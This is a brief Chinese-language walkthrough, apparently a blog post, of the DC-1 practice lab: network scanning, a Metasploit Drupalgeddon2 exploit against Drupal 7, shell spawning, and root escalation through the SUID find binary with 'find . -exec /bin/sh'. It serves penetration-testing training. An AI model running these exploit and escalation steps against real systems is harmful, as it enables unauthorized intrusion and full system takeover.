DC-1

发布时间 2023-12-11 17:38:35作者: 羲和跃明

1.扫描主机

sudo arp-scan -l

1 (2)

扫描端口

nmap -p- 192.168.42.147

3

扫描主机指纹,发现Drupal 7 cms

4

2.开始msf漏洞利用

mfconsole

5

search drupal

search 7600

use exploit/unix/webapp/drupal_drupalgeddon2

6

set rhosts 192.168.42.147

run

7

3.metepreter> 看到这个,说明成功拿下shell

shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

10

4.开始提权

find / -perm -u=s -type f 2>/dev/null

8

发现/usr/bin/find,利用提权
find . -exec /bin/sh \;

9

成功提权,寻找flag

11